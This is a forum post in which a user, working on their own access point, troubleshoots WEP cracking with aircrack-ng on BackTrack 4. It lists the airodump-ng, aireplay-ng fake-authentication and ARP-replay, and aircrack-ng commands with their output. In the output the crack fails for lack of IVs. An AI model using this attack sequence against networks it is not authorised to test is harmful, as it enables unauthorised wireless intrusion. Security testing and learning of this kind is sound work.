Hello everyone

I'm not new to Backtrack, but I'm having some trouble with the aircrack suite, that I didn't used to have in Backtrack3.

I've just installed BT4 and tried to crack my AP, these are the commands I used, wich are the same I used in BT3:

Code:
root@bt:~# airodump-ng -c 6 -w MyAP --bssid 00:24:B2:79:88:7A mon0 
CH  6 ][ BAT: 49 mins ][ Elapsed: 6 mins ][ 2010-01-17 20:20

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:24:B2:79:88:7A  -82  96     3385     1254    1   6  54e  WEP  WEP    OPN  MyAP

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:24:B2:79:88:7A  00:12:17:96:68:9E    0    1 - 1      0   108219
In another window I run the following:

Code:
root@bt:~# aireplay-ng -1 0 -a 00:24:B2:79:88:7A -h 00:12:17:96:68:9E mon0

20:18:08  Waiting for beacon frame (BSSID: 00:24:B2:79:88:7A) on channel 6

20:18:08  Sending Authentication Request (Open System) [ACK]
20:18:08  Authentication successful
20:18:08  Sending Association Request [ACK]
20:18:08  Association successful :-) (AID: 1)
In a third shell I run this:

Code:
root@bt:~# aireplay-ng -3 -b 00:24:B2:79:88:7A -h 00:12:17:96:68:9E mon0

20:13:32  Waiting for beacon frame (BSSID: 00:24:B2:79:88:7A) on channel 6
Saving ARP requests in replay_arp-0117-201333.cap
You should also start airodump-ng to capture replies.
Read 50866 packets (got 2 ARP requests and 15 ACKs), sent 90026 packets...(500 pps)
And for the last shell I run this:

Code:
root@bt:~# aircrack-ng -n 128 --bssid 00:24:B2:79:88:7A MyAP-01.cap
                                                                       Aircrack-ng 1.0 r1653


                                                       [00:00:25] Tested 133381 keys (got 1295 IVs)

   KB    depth   byte(vote)
    0   19/ 21   FB(2304) 00(2048) 09(2048) 12(2048) 41(2048) 4B(2048) 63(2048) 6A(2048) 82(2048) 83(2048) 93(2048) A5(2048)
    1   38/  1   F9(2048) 09(1792) 0F(1792) 13(1792) 1B(1792) 1C(1792) 32(1792) 35(1792) 37(1792) 3A(1792) 3E(1792) 40(1792)
    2   29/  2   F6(2048) 0E(1792) 10(1792) 18(1792) 1F(1792) 23(1792) 24(1792) 2A(1792) 2B(1792) 30(1792) 33(1792) 3A(1792)
    3    0/  8   65(3840) 03(2816) 31(2816) 40(2560) 76(2560) 9B(2560) C4(2560) C5(2560) 01(2304) 04(2304) 72(2304) 74(2304)
    4    9/ 62   F5(2560) 07(2304) 0E(2304) 39(2304) 56(2304) 92(2304) A8(2304) AD(2304) B6(2304) B9(2304) C8(2304) CB(2304)

Failed. Next try with 5000 IVs.
As you can see in window 3 I've gotten an ARP packet and sent a lot of packets, but in window 1 I only have like 1254 data packets...
In BT3 as soon as I got an ARP, the AP would start to send a lot of IV, that is used to crack the WEP key, but now I send the ARP packets but get few data to decrypt...

Can someone help me? As anyone else experienced this behaviour?
Thanks in advanced.